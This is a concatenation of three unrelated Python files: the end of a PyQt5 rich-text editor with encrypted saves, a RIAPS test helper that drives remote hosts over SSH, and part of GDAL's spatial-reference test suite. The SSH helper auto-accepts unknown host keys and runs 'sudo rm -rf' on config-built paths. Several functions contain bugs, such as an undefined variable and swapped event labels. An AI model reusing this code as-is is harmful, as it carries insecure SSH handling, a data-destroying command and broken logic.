pt") fontSize.valueChanged.connect(lambda size: self.text.setFontPointSize(size)) fontSize.setValue(14) fontColor = QtWidgets.QAction(QtGui.QIcon("icons/font-color.png"),"Change font color",self) fontColor.triggered.connect(self.fontColorChanged) boldAction = QtWidgets.QAction(QtGui.QIcon("icons/bold.png"),"Bold",self) boldAction.triggered.connect(self.bold) italicAction = QtWidgets.QAction(QtGui.QIcon("icons/italic.png"),"Italic",self) italicAction.triggered.connect(self.italic) underlAction = QtWidgets.QAction(QtGui.QIcon("icons/underline.png"),"Underline",self) underlAction.triggered.connect(self.underline) strikeAction = QtWidgets.QAction(QtGui.QIcon("icons/strike.png"),"Strike-out",self) strikeAction.triggered.connect(self.strike) superAction = QtWidgets.QAction(QtGui.QIcon("icons/superscript.png"),"Superscript",self) superAction.triggered.connect(self.superScript) subAction = QtWidgets.QAction(QtGui.QIcon("icons/subscript.png"),"Subscript",self) subAction.triggered.connect(self.subScript) alignLeft = QtWidgets.QAction(QtGui.QIcon("icons/align-left.png"),"Align left",self) alignLeft.triggered.connect(self.alignLeft) alignCenter = QtWidgets.QAction(QtGui.QIcon("icons/align-center.png"),"Align center",self) alignCenter.triggered.connect(self.alignCenter) alignRight = QtWidgets.QAction(QtGui.QIcon("icons/align-right.png"),"Align right",self) alignRight.triggered.connect(self.alignRight) alignJustify = QtWidgets.QAction(QtGui.QIcon("icons/align-justify.png"),"Align justify",self) alignJustify.triggered.connect(self.alignJustify) indentAction = QtWidgets.QAction(QtGui.QIcon("icons/indent.png"),"Indent Area",self) indentAction.setShortcut("Ctrl+Tab") indentAction.triggered.connect(self.indent) dedentAction = QtWidgets.QAction(QtGui.QIcon("icons/dedent.png"),"Dedent Area",self) dedentAction.setShortcut("Shift+Tab") dedentAction.triggered.connect(self.dedent) backColor = QtWidgets.QAction(QtGui.QIcon("icons/highlight.png"),"Change background color",self) backColor.triggered.connect(self.highlight) self.formatbar = self.addToolBar("Format") self.formatbar.addWidget(fontBox) self.formatbar.addWidget(fontSize) self.formatbar.addSeparator() self.formatbar.addAction(fontColor) self.formatbar.addAction(backColor) self.formatbar.addSeparator() self.formatbar.addAction(boldAction) self.formatbar.addAction(italicAction) self.formatbar.addAction(underlAction) self.formatbar.addAction(strikeAction) self.formatbar.addAction(superAction) self.formatbar.addAction(subAction) self.formatbar.addSeparator() self.formatbar.addAction(alignLeft) self.formatbar.addAction(alignCenter) self.formatbar.addAction(alignRight) self.formatbar.addAction(alignJustify) self.formatbar.addSeparator() self.formatbar.addAction(indentAction) self.formatbar.addAction(dedentAction) def initMenubar(self): menubar = self.menuBar() file = menubar.addMenu("File") edit = menubar.addMenu("Edit") view = menubar.addMenu("View") # Add the most important actions to the menubar file.addAction(self.newAction) file.addAction(self.openAction) file.addAction(self.saveAction) file.addAction(self.printAction) file.addAction(self.previewAction) edit.addAction(self.undoAction) edit.addAction(self.redoAction) edit.addAction(self.cutAction) edit.addAction(self.copyAction) edit.addAction(self.pasteAction) edit.addAction(self.findAction) # Toggling actions for the various bars toolbarAction = QtWidgets.QAction("Toggle Toolbar",self) toolbarAction.triggered.connect(self.toggleToolbar) formatbarAction = QtWidgets.QAction("Toggle Formatbar",self) formatbarAction.triggered.connect(self.toggleFormatbar) statusbarAction = QtWidgets.QAction("Toggle Statusbar",self) statusbarAction.triggered.connect(self.toggleStatusbar) view.addAction(toolbarAction) view.addAction(formatbarAction) view.addAction(statusbarAction) def initUI(self): self.text = QtWidgets.QTextEdit(self) # self.fileid = None # Set the tab stop width to around 33 pixels which is # more or less 8 spaces self.text.setTabStopWidth(33) self.initToolbar() self.initFormatbar() self.initMenubar() self.setCentralWidget(self.text) # Initialize a statusbar for the window self.statusbar = self.statusBar() # If the cursor position changes, call the function that displays # the line and column number self.text.cursorPositionChanged.connect(self.cursorPosition) # We need our own context menu for tables self.text.setContextMenuPolicy(Qt.CustomContextMenu) self.text.customContextMenuRequested.connect(self.context) self.text.textChanged.connect(self.changed) self.setGeometry(100,100,1030,800) self.setWindowTitle("Writer") self.setWindowIcon(QtGui.QIcon("icons/icon.png")) def changed(self): self.changesSaved = False def closeEvent(self,event): if self.changesSaved: event.accept() else: popup = QtWidgets.QMessageBox(self) popup.setIcon(QtWidgets.QMessageBox.Warning) popup.setText("The document has been modified") popup.setInformativeText("Do you want to save your changes?") popup.setStandardButtons(QtWidgets.QMessageBox.Save | QtWidgets.QMessageBox.Cancel | QtWidgets.QMessageBox.Discard) popup.setDefaultButton(QtWidgets.QMessageBox.Save) answer = popup.exec_() if answer == QtWidgets.QMessageBox.Save: self.save() elif answer == QtWidgets.QMessageBox.Discard: event.accept() else: event.ignore() def context(self,pos): # Grab the cursor cursor = self.text.textCursor() # Grab the current table, if there is one table = cursor.currentTable() # Above will return 0 if there is no current table, in which case # we call the normal context menu. If there is a table, we create # our own context menu specific to table interaction if table: menu = QtGui.QMenu(self) appendRowAction = QtWidgets.QAction("Append row",self) appendRowAction.triggered.connect(lambda: table.appendRows(1)) appendColAction = QtWidgets.QAction("Append column",self) appendColAction.triggered.connect(lambda: table.appendColumns(1)) removeRowAction = QtWidgets.QAction("Remove row",self) removeRowAction.triggered.connect(self.removeRow) removeColAction = QtWidgets.QAction("Remove column",self) removeColAction.triggered.connect(self.removeCol) insertRowAction = QtWidgets.QAction("Insert row",self) insertRowAction.triggered.connect(self.insertRow) insertColAction = QtWidgets.QAction("Insert column",self) insertColAction.triggered.connect(self.insertCol) mergeAction = QtWidgets.QAction("Merge cells",self) mergeAction.triggered.connect(lambda: table.mergeCells(cursor)) # Only allow merging if there is a selection if not cursor.hasSelection(): mergeAction.setEnabled(False) splitAction = QtWidgets.QAction("Split cells",self) cell = table.cellAt(cursor) # Only allow splitting if the current cell is larger # than a normal cell if cell.rowSpan() > 1 or cell.columnSpan() > 1: splitAction.triggered.connect(lambda: table.splitCell(cell.row(),cell.column(),1,1)) else: splitAction.setEnabled(False) menu.addAction(appendRowAction) menu.addAction(appendColAction) menu.addSeparator() menu.addAction(removeRowAction) menu.addAction(removeColAction) menu.addSeparator() menu.addAction(insertRowAction) menu.addAction(insertColAction) menu.addSeparator() menu.addAction(mergeAction) menu.addAction(splitAction) # Convert the widget coordinates into global coordinates pos = self.mapToGlobal(pos) # Add pixels for the tool and formatbars, which are not included # in mapToGlobal(), but only if the two are currently visible and # not toggled by the user if self.toolbar.isVisible(): pos.setY(pos.y() + 45) if self.formatbar.isVisible(): pos.setY(pos.y() + 45) # Move the menu to the new position menu.move(pos) menu.show() else: event = QtGui.QContextMenuEvent(QtGui.QContextMenuEvent.Mouse,QtCore.QPoint()) self.text.contextMenuEvent(event) def removeRow(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Delete the cell's row table.removeRows(cell.row(),1) def removeCol(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Delete the cell's column table.removeColumns(cell.column(),1) def insertRow(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Insert a new row at the cell's position table.insertRows(cell.row(),1) def insertCol(self): # Grab the cursor cursor = self.text.textCursor() # Grab the current table (we assume there is one, since # this is checked before calling) table = cursor.currentTable() # Get the current cell cell = table.cellAt(cursor) # Insert a new row at the cell's position table.insertColumns(cell.column(),1) def toggleToolbar(self): state = self.toolbar.isVisible() # Set the visibility to its inverse self.toolbar.setVisible(not state) def toggleFormatbar(self): state = self.formatbar.isVisible() # Set the visibility to its inverse self.formatbar.setVisible(not state) def toggleStatusbar(self): state = self.statusbar.isVisible() # Set the visibility to its inverse self.statusbar.setVisible(not state) def new(self): spawn = Main() spawn.show() def open(self): # Get filename and show only .writer files #PYQT5 Returns a tuple in PyQt5, we only need the filename self.filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File',".","(*.dte)")[0] if self.filename: with open(self.filename,"rb") as file: fd = dte_decrypt(file.read()) soup = BeautifulSoup(fd,"lxml") if soup.head: if soup.head.fileid: self.fileid = soup.head.fileid.text else: self.fileid = generateFileId() self.text.setText(fd) eventRegister(self.fileid,'Opened') def save(self): # Only open dialog if there is no filename yet #PYQT5 Returns a tuple in PyQt5, we only need the filename if not self.filename: self.filename = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File')[0] if self.filename: # Append extension if not there yet if not self.filename.endswith(".dte"): self.filename += ".dte" # We just store the contents of the text file along with the # format in html, which Qt does in a very nice way for us event_state = '' if not self.fileid: event_state = 'Modified' self.fileid = generateFileId() else: event_state = 'Created' print('file id available') with open(self.filename,"wb") as file: file_content=self.text.toHtml().replace("<head>","<head><fileid>"+self.fileid+"</fileid>") file.write(dte_encrypt(file_content)) self.changesSaved = True eventRegister(self.fileid,event_state) def preview(self): # Open preview dialog preview = QtPrintSupport.QPrintPreviewDialog() # If a print is requested, open print dialog preview.paintRequested.connect(lambda p: self.text.print_(p)) preview.exec_() def printHandler(self): # Open printing dialog dialog = QtPrintSupport.QPrintDialog() if dialog.exec_() == QtWidgets.QDialog.Accepted: self.text.document().print_(dialog.printer()) def cursorPosition(self): cursor = self.text.textCursor() # Mortals like 1-indexed things line = cursor.blockNumber() + 1 col = cursor.columnNumber() self.statusbar.showMessage("Line: {} | Column: {}".format(line,col)) def wordCount(self): wc = wordcount.WordCount(self) wc.getText() wc.show() def insertImage(self): # Get image file name #PYQT5 Returns a tuple in PyQt5 filename = QtWidgets.QFileDialog.getOpenFileName(self, 'Insert image',".","Images (*.png *.xpm *.jpg *.bmp *.gif)")[0] if filename: # Create image object image = QtGui.QImage(filename) # Error if unloadable if image.isNull(): popup = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, "Image load error", "Could not load image file!", QtWidgets.QMessageBox.Ok, self) popup.show() else: cursor = self.text.textCursor() cursor.insertImage(image,filename) def fontColorChanged(self): # Get a color from the text dialog color = QtWidgets.QColorDialog.getColor() # Set it as the new text color self.text.setTextColor(color) def highlight(self): color = QtWidgets.QColorDialog.getColor() self.text.setTextBackgroundColor(color) def bold(self): if self.text.fontWeight() == QtGui.QFont.Bold: self.text.setFontWeight(QtGui.QFont.Normal) else: self.text.setFontWeight(QtGui.QFont.Bold) def italic(self): state = self.text.fontItalic() self.text.setFontItalic(not state) def underline(self): state = self.text.fontUnderline() self.text.setFontUnderline(not state) def strike(self): # Grab the text's format fmt = self.text.currentCharFormat() # Set the fontStrikeOut property to its opposite fmt.setFontStrikeOut(not fmt.fontStrikeOut()) # And set the next char format self.text.setCurrentCharFormat(fmt) def superScript(self): # Grab the current format fmt = self.text.currentCharFormat() # And get the vertical alignment property align = fmt.verticalAlignment() # Toggle the state if align == QtGui.QTextCharFormat.AlignNormal: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignSuperScript) else: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignNormal) # Set the new format self.text.setCurrentCharFormat(fmt) def subScript(self): # Grab the current format fmt = self.text.currentCharFormat() # And get the vertical alignment property align = fmt.verticalAlignment() # Toggle the state if align == QtGui.QTextCharFormat.AlignNormal: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignSubScript) else: fmt.setVerticalAlignment(QtGui.QTextCharFormat.AlignNormal) # Set the new format self.text.setCurrentCharFormat(fmt) def alignLeft(self): self.text.setAlignment(Qt.AlignLeft) def alignRight(self): self.text.setAlignment(Qt.AlignRight) def alignCenter(self): self.text.setAlignment(Qt.AlignCenter) def alignJustify(self): self.text.setAlignment(Qt.AlignJustify) def indent(self): # Grab the cursor cursor = self.text.textCursor() if cursor.hasSelection(): # Store the current line/block number temp = cursor.blockNumber() # Move to the selection's end cursor.setPosition(cursor.anchor()) # Calculate range of selection diff = cursor.blockNumber() - temp direction = QtGui.QTextCursor.Up if diff > 0 else QtGui.QTextCursor.Down # Iterate over lines (diff absolute value) for n in range(abs(diff) + 1): # Move to start of each line cursor.movePosition(QtGui.QTextCursor.StartOfLine) # Insert tabbing cursor.insertText("\t") # And move back up cursor.movePosition(direction) # If there is no selection, just insert a tab else: cursor.insertText("\t") def handleDedent(self,cursor): cursor.movePosition(QtGui.QTextCursor.StartOfLine) # Grab the current line line = cursor.block().text() # If the line starts with a tab character, delete it if line.startswith("\t"): # Delete next character cursor.deleteChar() # Otherwise, delete all spaces until a non-space character is met else: for char in line[:8]: if char != " ": break cursor.deleteChar() def dedent(self): cursor = self.text.textCursor() if cursor.hasSelection(): # Store the current line/block number temp = cursor.blockNumber() # Move to the selection's last line cursor.setPosition(cursor.anchor()) # Calculate range of selection diff = cursor.blockNumber() - temp direction = QtGui.QTextCursor.Up if diff > 0 else QtGui.QTextCursor.Down # Iterate over lines for n in range(abs(diff) + 1): self.handleDedent(cursor) # Move up cursor.movePosition(direction) else: self.handleDedent(cursor) def bulletList(self): cursor = self.text.textCursor() # Insert bulleted list cursor.insertList(QtGui.QTextListFormat.ListDisc) def numberList(self): cursor = self.text.textCursor() # Insert list with numbers cursor.insertList(QtGui.QTextListFormat.ListDecimal) def main(): app = QtWidgets.QApplication(sys.argv) sync_events = threading.Thread(target=db_update) main = Main() if is_connected("www.google.com"): #sync_events.daemon=False #sync_events.start() print("Syncing Events thread has start") main.show() else: print("Network issue!! Please connect to internet and try") main.show() sys.exit(app.exec_()) print("System Closed") sync_events.kill() print("Syncing closed") if __name__ == "__main__": main()
riaps_testing.py
"""RIAPS testing helper methods """ import os import sys import yaml import paramiko import zmq import time import threading import datetime stream = open('riaps_testing_config.yml', 'r') config = yaml.load(stream, Loader=yaml.SafeLoader) stream.close() for key in {"hosts", "username", "password", "logPath", "logPrefix"}: assert key in config, "Failed to find '%s' in configuration file" % key # Configure SSH client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) #Create ZMQ context ctx = zmq.Context() def parseString(str, name): """Replace keywords in string (commonly the contents of a file) This is a helper method for the runTest(...) method. It will automatically replace any keywords with the appropriate strings to automate testing. Args: str (str): The string in which to replace keywords name (str): The name of the RIAPS application Returns: (str, int): The newly parsed string and the number of hosts required for running the test. """ str = str.replace("NAME", name) num_hosts = 0 while str.find("HOST") != -1: assert num_hosts < len(config['hosts']), "More hosts required than provided" # Replace the first instance of HOST with the next available host str = str.replace("HOST", config['hosts'][num_hosts], 1) num_hosts += 1 return (str, num_hosts) def powerCycleControl(hostname, events): sock = ctx.socket(zmq.REQ) sock.connect('tcp://'+config['hosts'][hostNum]+':2234') msg = ('power',1) #second field is arbitrary for now, there in case one node could turn off multiple others for timediff in events: time.sleep(timediff) sock.send_pyobj(msg) assert sock.recv_pyobj() == 'Powercycle sent', "Powercycle failed for timediff: %d" % timediff def runTest(name, folder, riaps, depl, startupTime=300, runTime=60, cleanupTime=120, powerTiming=None): """Run a RIAPS application on BBB hosts Args: name (str): The name of RIAPS application folder (str): Path to the folder containing the riaps and depl files riaps (str): Name of the riaps file containing the application model depl (str): Name of the depl file containing the application deployment startupTime (int, optional): Time to wait for nodes to connect to riaps_ctrl. Defaults to 10 seconds. runTime (int, optional): Time to let application run. Defaults to 30 seconds. cleanupTime (int, optional): Time to wait after halting the application. Defaults to 10 seconds. powerTiming (dic, optional): An (int):(list) dict of timing to cycle power on nodes. The key is which index in the list of configured hosts (starting from zero) is sending the power signal. The list is the amount of time slept (secs) between power signals being sent, starting concurrently with riaps_ctrl. Returns: dictionary: A dictionary where the keys are the names of the log files collected. Each element is a a list of strings representing the lines of the log file. Raises: AssertionError: Raised if any invalid arguments are passed or if a test fails. """ # Verify that arguments point to valid files assert name != "" and not (' ' in name), "Invalid test name: %s" % name assert os.path.isdir(os.path.join(folder)), "Failed to find test folder: %s" % folder assert os.path.isfile(os.path.join(folder, riaps)), "Failed to find test riaps file: %s" % riaps assert os.path.isfile(os.path.join(folder, depl)), "Failed to find depl file: %s" % depl # Force folder to be an absolute path if not os.path.isabs(folder): folder = os.path.join(os.getcwd(), folder) # Verify that all hosts are accessible for host in config['hosts']: print("Verifying connection to %s" % host) try: client.connect(host, username=config['username'], password=config['password']) # Remove any existing logs in the logPath client.exec_command("sudo rm -rf %s" % os.path.join(config['logPath'], config['logPrefix'])) except: assert False, "Failed to connect host: %s" % host finally: client.close() # Read the provided riaps and depl files file = open(os.path.join(folder, riaps), "r") model = file.read() file.close() file = open(os.path.join(folder, depl), "r") deployment = file.read() file.close() # Parse files model, num_hosts = parseString(model, name) deployment, num_hosts = parseString(deployment, name) # Write parsed files file = open(os.path.join(folder, "test.riaps"), "w") file.write(model) file.close() file = open(os.path.join(folder, "test.depl"), "w") file.write(deployment) file.close() # Create test.rc file file = open("test.rc", "w") file.write("w %d\n" % startupTime) file.write("f %s\n" % folder) file.write("m test.riaps\n") file.write("d test.depl\n") file.write("l %s\n" % name) file.write("w %d\n" % runTime) file.write("h %s\n" % name) file.write("w %s\n" % cleanupTime) file.write("r %s\n" % name) file.write("w %s\n" % cleanupTime) file.write("q\n") file.close() if powerTiming is not None: threadPool = [] for key in powerTiming: threadPool.append(threading.Thread(target=powerCycleControl,args=(key,powerTiming[key]))) for thread in threadPool: thread.start() start_time = datetime.datetime.now() # Launch riaps_ctrl assert os.system("riaps_ctrl test.rc") == 0, "Error while running riaps_ctrl" if powerTiming is not None: for thread in threadPool: thread.join(timeout=1.0) assert thread.is_alive() == False, "A powerCycleControl thread failed to close!" # Collect logs logs = {} for i in range(num_hosts): host = config['hosts'][i] print("Collecting logs from %s" % host) try: # Find all log files on the target host client.connect(host, username=config['username'], password=config['password']) # Collect journalctl logs since = start_time.strftime('%Y-%m-%d %H:%M:%S') stdin, stdout, stderr = client.exec_command("sudo journalctl -u riaps-deplo --since '%s'" % since) print('\nJournalctl from %s' % host) for line in stdout: print(line.strip('\n')) # Collect client logs stdin, stdout, stderr = client.exec_command("ls %s" % os.path.join(config['logPath'], config['logPrefix'])) for line in stderr: print(line.strip('\n')) for logfile in stdout: logfile = logfile.strip('\n') print("\nFound logfile on %s named %s" % (host, logfile)) stdin2, stdout2, stderr2 = client.exec_command("cat %s" % os.path.join(config['logPath'], logfile)) log = [] for line in stdout2: line = line.strip('\n') print(line) log.append(line) logs["%d_%s" % (i, logfile)] = log except: assert False, "Failed to retrieve logs from host: %s" % host finally: client.close() return logs
osr_basic.py
#!/usr/bin/env pytest # -*- coding: utf-8 -*- ############################################################################### # $Id$ # # Project: GDAL/OGR Test Suite # Purpose: Basic tests of OGRSpatialReference (OSR) operation, not including # support for actual reprojection or use of EPSG tables. # Author: Frank Warmerdam <warmerdam@pobox.com> # ############################################################################### # Copyright (c) 2003, Frank Warmerdam <warmerdam@pobox.com> # Copyright (c) 2008-2013, Even Rouault <even dot rouault at spatialys.com> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. ############################################################################### import gdaltest from osgeo import osr import pytest from threading import Thread ############################################################################### # Create a UTM WGS84 coordinate system and check various items. def test_osr_basic_1(): utm_srs = osr.SpatialReference() # Southern hemisphere utm_srs.SetUTM(11, 0) utm_srs.SetWellKnownGeogCS('WGS84') assert utm_srs.GetUTMZone() == -11 # Northern hemisphere utm_srs.SetUTM(11) assert utm_srs.GetUTMZone() == 11 parm_list = \ [(osr.SRS_PP_CENTRAL_MERIDIAN, -117.0), (osr.SRS_PP_LATITUDE_OF_ORIGIN, 0.0), (osr.SRS_PP_SCALE_FACTOR, 0.9996), (osr.SRS_PP_FALSE_EASTING, 500000.0), (osr.SRS_PP_FALSE_NORTHING, 0.0)] for parm in parm_list: value = utm_srs.GetProjParm(parm[0], -1111) assert value == pytest.approx(parm[1], abs=.00000000000010), ('got %g for %s instead of %g.' % (value, parm[0], parm[1])) auth_list = [('GEOGCS', '4326'), ('DATUM', '6326')] for auth in auth_list: assert utm_srs.GetAuthorityName(auth[0]) == 'EPSG', \ ('Got authority %s instead of EPSG for %s' % (utm_srs.GetAuthorityName(auth[0]), auth[0])) assert str(utm_srs.GetAuthorityCode(auth[0])) == auth[1], \ ('Got code %s instead of %s for %s' % (utm_srs.GetAuthorityName(auth[0]), auth[1], auth[0])) ############################################################################### # Simple default NAD83 State Plane zone. def test_osr_basic_2(): srs = osr.SpatialReference() srs.SetStatePlane(403, 1) # California III NAD83. parm_list = \ [(osr.SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333), (osr.SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667), (osr.SRS_PP_LATITUDE_OF_ORIGIN, 36.5), (osr.SRS_PP_CENTRAL_MERIDIAN, -120.5), (osr.SRS_PP_FALSE_EASTING, 2000000.0), (osr.SRS_PP_FALSE_NORTHING, 500000.0)] for parm in parm_list: value = srs.GetProjParm(parm[0], -1111) assert gdaltest.approx_equal(parm[1], value), \ ('got %.16g for %s instead of %.16g.' % (value, parm[0], parm[1])) auth_list = [('GEOGCS', '4269'), ('DATUM', '6269'), ('PROJCS', '26943'), ('PROJCS|UNIT', '9001')] for auth in auth_list: assert srs.GetAuthorityName(auth[0]) == 'EPSG', \ ('Got authority %s instead of EPSG for %s' % (srs.GetAuthorityName(auth[0]), auth[0])) assert str(srs.GetAuthorityCode(auth[0])) == auth[1], \ ('Got code %s instead of %s for %s' % (srs.GetAuthorityCode(auth[0]), auth[1], auth[0])) ############################################################################### # NAD83 State Plane zone, but overridden to be in Feet. def test_osr_basic_3(): srs = osr.SpatialReference() # California III NAD83 (feet) srs.SetStatePlane(403, 1, 'Foot', 0.3048006096012192) # print srs.ExportToPrettyWkt() parm_list = \ [(osr.SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333), (osr.SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667), (osr.SRS_PP_LATITUDE_OF_ORIGIN, 36.5), (osr.SRS_PP_CENTRAL_MERIDIAN, -120.5), (osr.SRS_PP_FALSE_EASTING, 6561666.666666667), (osr.SRS_PP_FALSE_NORTHING, 1640416.666666667)] for parm in parm_list: value = srs.GetProjParm(parm[0], -1111) assert gdaltest.approx_equal(parm[1], value), \ ('got %.16g for %s instead of %.16g.' % (value, parm[0], parm[1])) auth_list = [('GEOGCS', '4269'), ('DATUM', '6269')] for auth in auth_list: assert srs.GetAuthorityName(auth[0]) == 'EPSG', \ ('Got authority %s instead of EPSG for %s' % (srs.GetAuthorityName(auth[0]), auth[0])) assert str(srs.GetAuthorityCode(auth[0])) == auth[1], \ ('Got code %s instead of %s for %s' % (srs.GetAuthorityCode(auth[0]), auth[1], auth[0])) assert srs.GetAuthorityName('PROJCS') is None, \ 'Got a PROJCS Authority but we should not' assert str(srs.GetAuthorityCode('PROJCS|UNIT')) != '9001', \ 'Got METER authority code on linear units.' assert srs.GetLinearUnitsName() == 'Foot', 'Didnt get Foot linear units' assert srs.GetLinearUnits() == pytest.approx(0.3048006096012192, 1e-16) assert srs.GetTargetLinearUnits('PROJCS') == pytest.approx(0.3048006096012192, 1e-16) assert srs.GetTargetLinearUnits(None) == pytest.approx(0.3048006096012192, 1e-16) ############################################################################### # Translate a coordinate system with nad shift into to PROJ.4 and back # and verify that the TOWGS84 parameters are preserved. def test_osr_basic_4(): srs = osr.SpatialReference() srs.SetGS(cm=-117.0, fe=100000.0, fn=100000) srs.SetLinearUnits('meter', 1) srs.SetGeogCS('Test GCS', 'Test Datum', 'WGS84', osr.SRS_WGS84_SEMIMAJOR, osr.SRS_WGS84_INVFLATTENING) srs.SetTOWGS84(1, 2, 3) assert srs.GetTOWGS84() == (1, 2, 3, 0, 0, 0, 0), 'GetTOWGS84() result is wrong.' proj4 = srs.ExportToProj4() srs2 = osr.SpatialReference() srs2.ImportFromProj4(proj4) assert srs2.GetTOWGS84() == (1, 2, 3, 0, 0, 0, 0), \ 'GetTOWGS84() result is wrong after PROJ.4 conversion.' ############################################################################### # Test URN support for OGC:CRS84. def test_osr_basic_5(): wkt_1 = osr.GetUserInputAsWKT('urn:ogc:def:crs:OGC:1.3:CRS84') wkt_2 = osr.GetUserInputAsWKT('WGS84') assert wkt_1 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Longitude",EAST],AXIS["Latitude",NORTH]]' assert wkt_2 == 'GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AXIS["Latitude",NORTH],AXIS["Longitude",EAST],AUTHORITY["EPSG","4326"]]' ############################################################################### # Test URN support for EPSG def test_osr_basic_6(): # Without version wkt_1 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG::4326') assert not (wkt_1.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_1.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1), \ 'EPSG:4326 urn lookup not as expected.' # With a version wkt_2 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG:6.6:4326') if wkt_2.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_2.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1: print(wkt_1) pytest.fail('EPSG:4326 urn lookup not as expected.') # Without version, but with no repeated :. Probably illegal from my understanding # of http://www.opengeospatial.org/ogcUrnPolicy, but found quite often in the wild # especially in content returned by GeoServer wkt_2 = osr.GetUserInputAsWKT('urn:x-ogc:def:crs:EPSG:4326') if wkt_2.find('GEOGCS["WGS 84",DATUM["WGS_1984"') == -1 or wkt_2.find('AXIS["Latitude",NORTH],AXIS["Longitude",EAST]') == -1: print(wkt_1) pytest.fail('EPSG:4326 urn lookup not as expected.') ############################################################################### # Test URN support for auto projection. def test_osr_basic_7(): wkt = osr.GetUserInputAsWKT('urn:ogc:def:crs:OGC::AUTO42001:-117:33') assert wkt.find('GEOGCS["WGS 84"') > 0 and wkt.find('PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-117],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["Meter",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH]') > 0, 'AUTO42001 urn lookup not as expected.' ############################################################################### # Test the SetLinearUnitsAndUpdateParameters() method. def test_osr_basic_8(): srs = osr.SpatialReference() srs.SetFromUserInput('+proj=tmerc +x_0=1000 +datum=WGS84 +units=m') srs.SetLinearUnits('Foot', 0.3048) fe = srs.GetProjParm('false_easting') assert fe == 1000.0, 'false easting was unexpectedly updated.' srs.SetFromUserInput('+proj=tmerc +x_0=1000 +datum=WGS84 +units=m') srs.SetLinearUnitsAndUpdateParameters('Foot', 0.3048) fe = srs.GetProjParm('false_easting') assert fe != 1000.0, 'false easting was unexpectedly not updated.' assert fe == pytest.approx(3280.840, abs=0.01), 'wrong updated false easting value.' ############################################################################### # Test the Validate() method. def test_osr_basic_9(): srs = osr.SpatialReference() srs.SetFromUserInput("PROJCS[\"unnamed\",GEOGCS[\"unnamed ellipse\",DATUM[\"unknown\",SPHEROID[\"unnamed\",6378137,0]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433]],PROJECTION[\"Mercator_2SP\"],PARAMETER[\"standard_parallel_1\",0],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",0],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"Meter\",1],EXTENSION[\"PROJ4\",\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs\"]]") assert srs.Validate() == 0 ############################################################################### # Test the Validate() method on PROJCS with AXIS definition (#2739) def test_osr_basic_10(): srs = osr.SpatialReference() srs.SetFromUserInput("""PROJCS["NAD83(CSRS98) / UTM zone 20N (deprecated)", GEOGCS["NAD83(CSRS98)", DATUM["NAD83_Canadian_Spatial_Reference_System", SPHEROID["GRS 1980",6378137,298.257222101, AUTHORITY["EPSG","7019"]], TOWGS84[0,0,0,0,0,0,0], AUTHORITY["EPSG","6140"]], PRIMEM["Greenwich",0, AUTHORITY["EPSG","8901"]], UNIT["degree",0.0174532925199433, AUTHORITY["EPSG","9108"]], AUTHORITY["EPSG","4140"]], PROJECTION["Transverse_Mercator"], PARAMETER["latitude_of_origin",0], PARAMETER["central_meridian",-63], PARAMETER["scale_factor",0.9996], PARAMETER["false_easting",500000], 